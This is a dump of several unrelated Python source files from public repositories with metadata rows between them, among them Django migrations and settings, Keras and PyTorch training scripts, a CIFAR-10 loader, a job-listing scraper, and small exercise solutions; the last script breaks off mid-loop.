                ('name', models.CharField(blank=True, max_length=100, null=True)),
                ('count', models.IntegerField(blank=True, default=0, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Project',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(blank=True, max_length=100, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Trend',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.CharField(blank=True, max_length=500, null=True)),
                ('tweets_count', models.IntegerField(blank=True, default=0, null=True)),
                ('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project')),
            ],
        ),
        migrations.CreateModel(
            name='Tweet',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('tweet_id', models.BigIntegerField(blank=True, null=True)),
                ('text', models.CharField(blank=True, max_length=5000, null=True)),
                ('retweet_count', models.IntegerField(blank=True, null=True)),
                ('created_at', models.DateTimeField(blank=True, null=True)),
                ('retweet_id', models.BigIntegerField(blank=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user_id', models.BigIntegerField(blank=True, null=True)),
                ('screen_name', models.CharField(blank=True, default=b'', max_length=500, null=True)),
                ('followers_count', models.IntegerField(blank=True, default=0, null=True)),
                ('location', models.CharField(blank=True, default=b'', max_length=500, null=True)),
                ('centrality', models.FloatField(blank=True, default=0.0, null=True)),
                ('followers', models.ManyToManyField(blank=True, null=True, related_name='_user_followers_+', to='mole.User')),
            ],
        ),
        # Late additions: FK fields wired up after the models exist.
        migrations.AddField(
            model_name='tweet',
            name='author',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.User'),
        ),
        migrations.AddField(
            model_name='tweet',
            name='project',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project'),
        ),
        migrations.AddField(
            model_name='tweet',
            name='trend',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Trend'),
        ),
        migrations.AddField(
            model_name='keyword',
            name='project',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project'),
        ),
    ]
| [
"mrivero@Marina.local"
] | mrivero@Marina.local |
96eee24baac64893bcfc7cf561ff29fe704e7ae1 | e902e5fc2d79203bff2e716a63054d3cdb667f23 | /Casa/wsgi.py | b2677e2dcad63b0cb8a4944a304a5877d20a98e9 | [] | no_license | amanjaiswalofficial/Casa | a6625f92019b11a8804d78c04f377cc5e7262634 | d9eea1b4b8b7bbb01ae67bcaf44a5e1b594bf847 | refs/heads/master | 2020-05-04T02:00:52.777164 | 2019-04-23T08:57:05 | 2019-04-23T08:57:05 | 178,918,528 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | """
WSGI config for Casa project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os

from django.core.wsgi import get_wsgi_application

# Point Django at the project settings before building the WSGI handler.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Casa.settings')

# Module-level WSGI callable picked up by the application server.
application = get_wsgi_application()
| [
"amanjai01.gmail.com"
] | amanjai01.gmail.com |
b0d8a79b1e2380094e3fecd28ce37d7f093034af | e6378e26e05ddad794f770b83bc0471c13da6452 | /myproject_3/myproject_3/settings.py | fcf3991bded13e4db0091ee0c0c865cd9813120c | [] | no_license | dheerajgadhamsetty/REST_API | 122954bfc3dae2de0d218b8909792d3f75480903 | d370c7cce5ed6b325755ab243c20f58335cafbba | refs/heads/master | 2023-07-18T08:12:15.463796 | 2021-08-29T06:53:28 | 2021-08-29T06:53:28 | 400,971,889 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,289 | py | """
Django settings for myproject_3 project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = 'django-insecure-nexhg*7y2rx&(br1g!+(4wna5_^o(&%hshbrft15xv$mvxin8&'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

# Empty list is fine for local development; must list real hosts in production.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'myapp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myproject_3.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'myproject_3.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"dheerajgadhamsetty"
] | dheerajgadhamsetty |
e2305a194758b56976ba2b3d942a874de4f50a80 | bfe13b5458c5a3b8a212479ad8596934738a83d9 | /solar/solar_conv1d_1.py | b6c23eee1267e5d4790dbb3a0f5d9eff7cae0ab1 | [] | no_license | sswwd95/Project | f32968b6a640dffcfba53df943f0cf48e60d29df | fdcf8556b6203a407e5548cb4eda195fb597ad6e | refs/heads/master | 2023-04-21T23:03:24.282518 | 2021-02-15T00:55:16 | 2021-02-15T00:55:16 | 338,989,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,872 | py | import pandas as pd
import numpy as np
import os
import glob
import random
import tensorflow.keras.backend as K
import warnings
warnings.filterwarnings('ignore')
train = pd.read_csv('./solar/csv/train.csv')
sub = pd.read_csv('./solar/csv/sample_submission.csv')
# Hour - 시간
# Minute - 분
# DHI - 수평면 산란일사량(Diffuse Horizontal Irradiance (W/m2))
# DNI - 직달일사량(Direct Normal Irradiance (W/m2))
# WS - 풍속(Wind Speed (m/s))
# RH - 상대습도(Relative Humidity (%))
# T - 기온(Temperature (Degree C))
# Target - 태양광 발전량 (kW)
# axis = 0은 행렬에서 행의 원소를 다 더함, 1은 열의 원소를 다 더함
# 1. 데이터
#DHI, DNI 보다 더 직관적인 GHI 열 추가.
def preprocess_data(data, is_train=True):
data['cos'] = np.cos(np.pi/2 - np.abs(data['Hour']%12-6)/6*np.pi/2)
data.insert(1, 'GHI', data['DNI']*data['cos']+data['DHI'])
temp = data.copy()
temp = temp[['Hour','TARGET','GHI','DHI', 'DNI', 'WS', 'RH', 'T']]
if is_train==True:
temp['Target1'] = temp['TARGET'].shift(-48).fillna(method='ffill') # day7
temp['Target2'] = temp['TARGET'].shift(-48*2).fillna(method='ffill') # day8
temp = temp.dropna()
return temp.iloc[:-96] # day8에서 2일치 땡겨서 올라갔기 때문에 마지막 2일 빼주기
elif is_train==False:
temp = temp[['Hour','TARGET','GHI','DHI', 'DNI', 'WS', 'RH', 'T']]
return temp.iloc[-48:,:] # 트레인데이터가 아니면 마지막 하루만 리턴시킴
df_train = preprocess_data(train)
x_train = df_train.to_numpy()
print(x_train)
print(x_train.shape) #(52464, 10) day7,8일 추가해서 컬럼 10개
###### test파일 합치기############
df_test = []
for i in range(81):
file_path = '../solar/test/' + str(i) + '.csv'
temp = pd.read_csv(file_path)
temp = preprocess_data(temp, is_train=False) # 위에서 명시한 False => 마지막 하루만 리턴
df_test.append(temp) # 마지막 하루 값들만 전부 붙여주기
x_test = pd.concat(df_test)
print(x_test.shape) #(3888, 8) -> (81, 48,8) 81일, 하루(24*2(30분단위)=48), 8개 컬럼
x_test = x_test.to_numpy()
##################################
# 정규화 (데이터가 0으로 많이 쏠려있어서 standardscaler 사용)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(x_train[:,:-2]) # day7,8일을 빼고 나머지 컬럼들을 train
x_train[:,:-2] = scaler.transform(x_train[:,:-2])
x_test = scaler.transform(x_test)
######## train데이터 분리 ###########
def split_xy(data,timestep):
x, y1, y2 = [],[],[]
for i in range(len(data)):
x_end = i + timestep
if x_end>len(data):
break
tmp_x = data[i:x_end,:-2] # x_train
tmp_y1 = data[x_end-1:x_end,-2] # day7 / x_end-1:x_end => i:x_end와 같은 위치로 맞춰주기
tmp_y2 = data[x_end-1:x_end,-1] # day8
x.append(tmp_x)
y1.append(tmp_y1)
y2.append(tmp_y2)
return(np.array(x), np.array(y1), np.array(y2))
x, y1, y2 = split_xy(x_train,1) # x_train을 한 행씩 자른다. (30분 단위로 보면서 day7,8의 같은 시간대 예측)
print(x.shape) #(52464, 1, 8)
print(y1.shape) #(52464, 1)
print(y2.shape) #(52464, 1)
########## test 데이터를 train 데이터와 같게 분리 ######
def split_x(data, timestep) :
x = []
for i in range(len(data)):
x_end = i + timestep
if x_end>len(data):
break
tmp_x = data[i:x_end]
x.append(tmp_x)
return(np.array(x))
x_test = split_x(x_test,1)
######################################################
from sklearn.model_selection import train_test_split
x_train, x_val, y1_train, y1_val, y2_train, y2_val = train_test_split(
x, y1, y2, train_size = 0.8, random_state=0)
print(x_train.shape) #(41971, 1, 8)
def quantile_loss(q, y_true, y_pred):
e = (y_true - y_pred) # 원래값에서 예측값 뺀 것
return K.mean(K.maximum(q*e, (q-1)*e), axis=-1)
quantiles = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]
# 2. 모델구성
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv1D, Flatten, Dropout
def Model():
model = Sequential()
model.add(Conv1D(128,2,padding='same',activation='relu', input_shape = (1,8)))
model.add(Dropout(0.2))
model.add(Conv1D(64,2,padding='same', activation='relu'))
model.add(Conv1D(64,2,padding='same', activation='relu'))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='relu'))
return model
from tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint,ReduceLROnPlateau
modelpath = '../solar/check/solar0121_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
es = EarlyStopping(monitor = 'val_loss', patience=10, mode='min')
lr = ReduceLROnPlateau(monitor='val_loss', patience=5, factor=0.5)
bs = 16
epochs = 1
######day7######
x=[]
for q in quantiles:
model = Model()
modelpath = '../solar/check/solar_0121_day7_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.compile(loss=lambda y_true,y_pred: quantile_loss(q,y_true, y_pred),
optimizer='adam', metrics = [lambda y, y_pred: quantile_loss(q, y, y_pred)])
model.fit(x_train,y1_train, batch_size = bs, callbacks=[es, cp, lr], epochs=epochs, validation_data=(x_val, y1_val))
pred = pd.DataFrame(model.predict(x_test).round(2)) # round는 반올림 (2)는 . 뒤의 자리수 -> ex) 0.xx를 반올림
x.append(pred)
df_temp1 = pd.concat(x, axis=1)
df_temp1[df_temp1<0] = 0 # 0보다 작으면 0로 한다.
num_temp1 = df_temp1.to_numpy()
sub.loc[sub.id.str.contains('Day7'), 'q_0.1':] = num_temp1
######day8#######
x = []
for q in quantiles:
model = Model()
modelpath = '../solar/check/solar_0121_day8_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.compile(loss=lambda y_true,y_pred: quantile_loss(q,y_true, y_pred),
optimizer='adam', metrics = [lambda y, y_pred: quantile_loss(q, y, y_pred)])
model.fit(x_train,y2_train, batch_size = bs, callbacks=[es, cp, lr], epochs=epochs, validation_data=(x_val, y2_val))
pred = pd.DataFrame(model.predict(x_test).round(2)) # round는 반올림 (2)는 . 뒤의 자리수 -> ex) 0.xx를 반올림
x.append(pred)
df_temp2 = pd.concat(x, axis=1)
df_temp2[df_temp2<0] = 0
num_temp2 = df_temp2.to_numpy()
sub.loc[sub.id.str.contains('Day8'), 'q_0.1':] = num_temp2
sub.to_csv('./solar/csv/sub_0121.csv', index=False)
| [
"sswwd95@gmail.com"
] | sswwd95@gmail.com |
410b397dc6a489aa072140828831f2d5c2b5bc1d | b70964419f820d7b5979e11c6b1dcc3ad6e2f32b | /my-projects/how-to-web-scrap/beautifulsoup-tutorial.py | d217108d769d10b59393bf32cf0eafc89c5c847e | [] | no_license | pedrogaldiano/learning-python | d381c8d149766e29579270945956f33aa28a867a | b036de991a926c021a97e60b6b8bba063b3e04b9 | refs/heads/master | 2023-06-05T15:24:07.670598 | 2021-06-12T00:37:55 | 2021-06-12T00:37:55 | 351,215,403 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,201 | py | from bs4 import BeautifulSoup
import requests
url = 'https://www.timesjobs.com/candidate/job-search.html?searchType=personalizedSearch&from=submit&txtKeywords=python&txtLocation='
html_text = requests.get(url).text
soup = BeautifulSoup(html_text, 'lxml')
jobs = soup.find_all('li', class_="clearfix job-bx wht-shd-bx")
for job in jobs:
# job = soup.find('li', class_="clearfix job-bx wht-shd-bx")
# job_title = job.find('strong', class_="blkclor").text.strip()
job_company = job.find('h3', class_="joblist-comp-name").text.strip()
job_exp = job.ul.li.text.strip()
job_loc = job.ul.span.text.strip()
job_info = job.find('ul', class_="list-job-dtl clearfix")
job_skills = job_info.span.text.strip().replace(' ', '').replace(',', ', ')
# job_desc = job_info.li.text.strip()
# index_job_desc1 = job_desc.index(':') + 3
# index_job_desc2 = job_desc.index('...') + 3
# job_posted = job.find('span', class_="sim-posted").text.strip()
job_more = job.find('a')['href']
print(f'''
Skills: {job_skills}
Experience: {job_exp[11:]}
Location: {job_loc}
Company: {job_company}
Link : {job_more}''')
| [
"noreply@github.com"
] | noreply@github.com |
237ed5f539d9574b418d151c89a4c1c84834526c | 3adec884f06eabfe50d4ab3456123e04d02b02ff | /287. Find the Duplicate Number.py | df0582aa45ceb74b6bdc850e22299524e03b7121 | [] | no_license | windmzx/pyleetcode | c57ecb855c8e560dd32cf7cf14616be2f91ba50e | d0a1cb895e1604fcf70a73ea1c4b1e6b283e3400 | refs/heads/master | 2022-10-05T17:51:08.394112 | 2020-06-09T09:24:28 | 2020-06-09T09:24:28 | 250,222,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | from typing import List
class Solution:
def findDuplicate(self, nums: List[int]) -> int:
left = 1
right = len(nums)
while left < right:
mid = (left+right)//2
count = 0
for i in nums:
if i <= mid:
count += 1
if count>mid:
right=mid
else:
left=mid+1
return left
if __name__ == "__main__":
x=Solution()
print(x.findDuplicate([1,3,3,2]))
| [
"2281927774@qq.com"
] | 2281927774@qq.com |
34017423ccd92177b7ccc9ac8445d31505fcfc05 | 20aadf6ec9fd64d1d6dffff56b05853e0ab26b1f | /problemset3/hangmanPart1.py | 98e635434a0aee5915adad9d46256d25316d340e | [] | no_license | feminas-k/MITx---6.00.1x | 9a8e81630be784e5aaa890d811674962c66d56eb | 1ddf24c25220f8b5f78d36e2a3342b6babb40669 | refs/heads/master | 2021-01-19T00:59:57.434511 | 2016-06-13T18:13:17 | 2016-06-13T18:13:17 | 61,058,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | def isWordGuessed(secretWord, lettersGuessed):
'''
secretWord: string, the word the user is guessing
lettersGuessed: list, what letters have been guessed so far
returns: boolean, True if all the letters of secretWord are in lettersGuessed;
False otherwise
'''
# FILL IN YOUR CODE HERE...
for i in secretWord:
if i not in lettersGuessed:
return False
return True
| [
"femi1991@gmail.com"
] | femi1991@gmail.com |
3565db12c8b480aa89ccde8a920b235468f5b8bd | a76401f82ed1c9ac47ddaff27681b90f37627426 | /.history/student_olx/main/views_20210918220710.py | 00898ea1a70e8e5709999b326bcaf4ccf228a65b | [] | no_license | RiteshK555/itw-project | e90e1dd13517ee8b07d72cc3bd5a42af367ab587 | a2e4c8682c2030ff77da9ade5ae4677bd475f87a | refs/heads/master | 2023-08-30T03:48:58.904979 | 2021-11-10T09:50:59 | 2021-11-10T09:50:59 | 410,032,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | from django.http.response import HttpResponseRedirect
from django.shortcuts import render,redirect
from .models import ToDoList
# Create your views here.
from django.http import HttpResponse
from .forms import CreateNewProduct
def index(response,id):
lis=ToDoList.objects.get(id=id)
return render(response,"main/base.html",{"name":lis})
def home(response):
return render(response,"main/home.html",{"name":"test"})
def sell(response):
if response.method == "POST":
form=CreateNewProduct(response.POST)
if form.is_valid():
p_n=form.cleaned_data["product_name"]
d=form.cleaned_data["description"]
m=ToDoList(product_name=p_n,description=d)
d.save()
m.save()
return HttpResponseRedirect("/%i" %m.id)
else:
form=CreateNewProduct()
return render(response,"main/sell.html",{"form":form})
def buy(response):
return render(response,"main/buy.html",{})
| [
""
] | |
b208b1c05aecfb3ed8bf1b22d72edc9eea8eac98 | cde798e18c5b134d5ca8beab102573e4b2e9a33b | /CIFAR/cifar10_data.py | ae150dac9e72e2411f42160f175a0f5f706940ec | [] | no_license | trifisch/ml-experiments | b9a6e3c96cf7a40fe541ce485ec6812c3424ab8f | 4e6ab63df2b69da027b9ea3eac4212364863162f | refs/heads/master | 2022-11-06T05:16:58.174506 | 2020-06-16T14:02:12 | 2020-06-16T14:02:12 | 267,070,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,628 | py | import numpy as np
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
from sklearn.model_selection import train_test_split
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# configurable parameters
val_ratio = 0.3 # percentage of validation set values
random_state = 0 # for reproducible splits
rotation_range=10
zoom_range=0.05
width_shift_range=0.05
height_shift_range=0.05
fill_mode='constant'
cval=0.0
horizontal_flip=False
vertical_flip=False
class CIFAR10:
def __init__(self, scale_mode="none", augment_size=0):
# Load the data set
(self.x_train, self.y_train), (self.x_test, self.y_test) = cifar10.load_data()
# Convert to float32
self.x_train = self.x_train.astype(np.float32)
self.y_train = self.y_train.astype(np.float32)
self.x_test = self.x_test.astype(np.float32)
self.y_test = self.y_test.astype(np.float32)
# split validation set from training set
self.x_train, self.x_val, self.y_train, self.y_val = train_test_split(self.x_train, self.y_train, test_size=val_ratio, random_state=random_state)
# Save important data attributes as variables
self.train_size = self.x_train.shape[0]
self.val_size = self.x_val.shape[0]
self.test_size = self.x_test.shape[0]
# image dimensions
self.width = self.x_train.shape[1]
self.height = self.x_train.shape[2]
self.depth = self.x_train.shape[3]
self.num_features = self.width * self.height * self.depth
self.num_classes = 10 # Constant for the data set
# Reshape the y data to one hot encoding
self.y_train = to_categorical(self.y_train, num_classes=self.num_classes)
self.y_val = to_categorical(self.y_val, num_classes=self.num_classes)
self.y_test = to_categorical(self.y_test, num_classes=self.num_classes)
# augment train data
self.augment_data(augment_size=augment_size)
# scale train, val and test data
self.scale_data(scale_mode=scale_mode)
def augment_data(self, augment_size=0):
if augment_size==0:
return
# Create an instance of the image data generator class
image_generator = ImageDataGenerator(
rotation_range=rotation_range,
zoom_range=zoom_range,
width_shift_range=width_shift_range,
height_shift_range=height_shift_range,
fill_mode=fill_mode,
horizontal_flip=horizontal_flip,
vertical_flip=vertical_flip,
cval=cval)
# Fit the data generator
image_generator.fit(self.x_train, augment=True)
# Get random train images for the data augmentation
rand_idxs = np.random.randint(self.train_size, size=augment_size)
x_augmented = self.x_train[rand_idxs].copy()
y_augmented = self.y_train[rand_idxs].copy()
x_augmented = image_generator.flow(x_augmented, batch_size=augment_size, shuffle=False).next()#[0]
# Append the augmented images to the train set
self.x_train = np.concatenate((self.x_train, x_augmented))
self.y_train = np.concatenate((self.y_train, y_augmented))
self.train_size = self.x_train.shape[0]
def scale_data(self, scale_mode="none", preprocess_params=None):
# Preprocess the data
if scale_mode == "standard":
if preprocess_params:
self.scaler = StandardScaler(**preprocess_params)
else:
self.scaler = StandardScaler()
elif scale_mode == "minmax":
if preprocess_params:
self.scaler = MinMaxScaler(**preprocess_params)
else:
self.scaler = MinMaxScaler(feature_range=(0, 1))
else:
return
# Temporary flatteining of the x data
self.x_train = self.x_train.reshape(self.train_size, self.num_features)
self.x_val = self.x_val.reshape(self.val_size, self.num_features)
self.x_test = self.x_test.reshape(self.test_size, self.num_features)
# Fitting and transforming
self.scaler.fit(self.x_train)
self.x_train = self.scaler.transform(self.x_train)
self.x_val = self.scaler.transform(self.x_val)
self.x_test = self.scaler.transform(self.x_test)
# Reshaping the xdata back to the input shape
self.x_train = self.x_train.reshape(
(self.train_size, self.width, self.height, self.depth))
self.x_val = self.x_val.reshape(
(self.val_size, self.width, self.height, self.depth))
self.x_test = self.x_test.reshape(
(self.test_size, self.width, self.height, self.depth))
# just for general check: show random pics from train, val, and test set
if __name__ == "__main__":
import matplotlib.pyplot as plt
cifar = CIFAR10(scale_mode="minmax")
train_img = cifar.x_train[np.random.randint(0, cifar.x_train.shape[0])]
val_img = cifar.x_train[np.random.randint(0, cifar.x_val.shape[0])]
test_img = cifar.x_train[np.random.randint(0, cifar.x_test.shape[0])]
fig, axes = plt.subplots(1, 3)
plt.tight_layout()
scale = 1.0 # use 255.0 if not already scaled upfront, e.g. with minmax scaler
axes[0].imshow(train_img/scale)
axes[0].set_title("Train")
axes[1].imshow(val_img/scale)
axes[1].set_title("Val")
axes[2].imshow(test_img/scale)
axes[2].set_title("Test")
plt.show()
| [
"trifisch@gmail.com"
] | trifisch@gmail.com |
3936f486d98614476a1c024263c2f459ed44e998 | 16260b9e32245ab00f15911a610fa5de50830310 | /bilstm.py | c51bf074a961fbae1b659850d4f6c46b60f6fcba | [] | no_license | lorenzoscottb/semantic_author_profiling | 3c42a6f4ec5564d707e56183b8dcbe3abca8de00 | 5182a234aa0f1c7a42713a7a16e34da9a295566a | refs/heads/master | 2020-03-19T03:10:41.299438 | 2019-01-23T11:22:59 | 2019-01-23T11:22:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,647 | py |
import random
import logging
from numpy import array
from numpy import cumsum
from keras.models import Sequential
from keras.layers import LSTM
from keras.layers import Dense
from keras.layers import Bidirectional
from keras.utils.np_utils import to_categorical
from sklearn.preprocessing import StandardScaler
from pandas_ml import ConfusionMatrix
import matplotlib.pyplot as plt
# The BiLSTM
def Bi_LSTM(units, features, time_steps, prn=False):
model = Sequential()
model.add(Bidirectional(LSTM(units, return_sequences=False),
input_shape=(time_steps, features),
merge_mode='concat'))
model.add(Dense(int((units/2)), activation='relu'))
model.add(Dense(43, activation='softmax'))
model.compile(loss='sparse_categorical_crossentropy',
optimizer='adam', metrics=['acc'])
if prn:
print(model.summary())
return model
# Training
# setting the task ; 3D modelling : sample, time steps, and feature.
model = Bi_LSTM(512, 400, None, prn=True)
# train model on given % of stimuli
# indicate the newtwork corpus:
# touples of shape (expected output(integer), sentence(series of vectors))
ts = int((len(network_corpus)*65)/100)
for i in range(ts):
print('interation '+str(i)+'of'+' '+str(ts))
x = [vec for vec in network_corpus[i][1]]
y = network_corpus[i][0]
# extracting each sample (sentence) lenth
length = len(x)
# reshape: sample, time steps, feature at each time step.
# if I have 1000 sentences of 10 words, presented in a 3-dim vector:
# is nb_samples = 1000, time steps = 10, input_dim = 3
X = array(x).reshape(1, length, 400)
Y = array(y).reshape(1, 1)
model.fit(X, Y, epochs=10, batch_size=33, verbose=2)
# Evaluation
start = len(network_corpus)-ts
tt = 25
out = list(np.zeros(tt))
exp = list(np.zeros(tt))
correct = 0
for i in range(tt):
x = [vec for vec in network_corpus[i+start][1]]
y = network_corpus[i+start][0]
length = len(x)
X = array(x).reshape(1, length, 400)
Y = array(y).reshape(1, 1)
out[i] = model.predict_classes(X, verbose=2)
exp[i] = y
if y == out[i]:
correct += 1
print('predicted Class: '+str(out[i])+' Actual Class: '+
str(y))
print('Overall accuracy: '+str(int((correct*100)/tt))+'%')
# plotting the confusion matrix
# reconverting numbers to presidnts names
predicted = [list(d.keys())[int(p)] for p in nltk.word_tokenize(str(out)) if p.isdigit()]
actual = [list(d.keys())[a] for a in exp]
cf = ConfusionMatrix(actual, predicted)
cf.plot(normalized=True, backend='seaborn', cmap="Blues")
plt.show()
| [
"noreply@github.com"
] | noreply@github.com |
8e6659d0c00a5650bd1681c6f669fe5fc6f3a1b4 | 2891a904792376e20c3b481a556c3823a2a09625 | /src/spatial_stream.py | 4ae598257218b9e77f91486a19789e8f23196784 | [
"MIT"
] | permissive | ganler/2StreamConvNet-for-single-channel-series | 46dac979a2b5853804f2dd3415995c0ac0a61899 | c58c248c3a259cee4a4c14575bc95b643e56a6c6 | refs/heads/master | 2021-07-03T06:31:19.186924 | 2020-09-19T08:35:01 | 2020-09-19T08:35:01 | 171,025,708 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,435 | py | import torchvision.models as models
from torchvision import transforms
import torch
import numpy as np
from torch import nn
from src.spatial_and_motion_dataloader import * # self-made
if __name__ == "__main__":
key_word = 'spatial'
# DEVICE
# ########## !!! LOOK HERE !!! ############ #
use_gpu = 0
# ######################################### #
device = torch.device('cuda' if torch.cuda.is_available() and use_gpu else 'cpu')
# PARAMETERS
num_epoachs = 1
batch_size = 5
times4print = 100 / batch_size # time for print (I print the info for every * batches)
num_classes = 17
classes = np.arange(num_classes)
learning_rate = 0.01
train_dataset = sm_dataset('train.csv', key_word, transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]))
valid_dataset = sm_dataset('valid.csv', key_word, transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]))
# LOADER
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=1,
num_workers=2,
shuffle=False)
valid_loader = torch.utils.data.DataLoader(dataset=valid_dataset,
num_workers=2,
shuffle=False)
# ===========CHOOSE THE MODELS===========
# MODEL, LOSS FUNC AND OPTIMISER
# resnet
# model = models.ResNet(pretrained=True)
model = models.resnet18(pretrained=True)
# model = models.resnet34(pretrained=True)
# model = models.resnet50(pretrained=True)
# vgg
# model = models.VGG(pretrained=True)
# model = models.vgg11(pretrained=True)
# model = models.vgg16(pretrained=True)
# model = models.vgg16_bn(pretrained=True)
pre_model = model
model.fc = nn.Linear(model.fc.in_features, num_classes)
pretrained_dict = pre_model.state_dict()
model_dict = model.state_dict()
# 将pretrained_dict里不属于model_dict的键剔除掉
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
# TRAIN MODE 1 ================================
model.load_state_dict(model_dict)
# 至此fine-tune对应的结构已经搞定
# 除了最后两层,其余都把梯度给冻结
for para in list(model.parameters())[:-2]:
para.requires_grad = False
# 只训练最后2层
optimizer = torch.optim.Adamax(params=[model.fc.weight, model.fc.bias], lr=learning_rate, weight_decay=1e-4)
# -------------================================
#
# # TRAIN MODE 2 ================================
# ignored_params = list(map(id, model.parameters()[:-2]))
# # fc3是net中的一个数据成员
# base_params = filter(
# lambda p: id(p) not in ignored_params,
# model.parameters()
# )
# '''
# id(x)返回的是x的内存地址。上面的意思是,对于在net.parameters()中的p,过滤掉'id(p) not in ignored_params'中的p。
# '''
#
# optimizer = torch.optim.Adamax(
# [{'params': base_params},
# {'params': model.fc3.parameters(), 'lr': learning_rate}],
# 1e-3, weight_decay=1e-4
# )
# # -------------================================
if torch.cuda.is_available() and use_gpu:
model = model.cuda()
loss_func = nn.CrossEntropyLoss()
# TRAIN
total_steps = len(train_loader)
for epoach in range(num_epoachs):
loss_accumulation = 0
for i, (imgs, labels) in enumerate(train_loader):
imgs = imgs.to(device)
labels = labels.to(device)
out = model(imgs)
loss = loss_func(out, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_accumulation += loss.item()
if (i + 1) % times4print == 0:
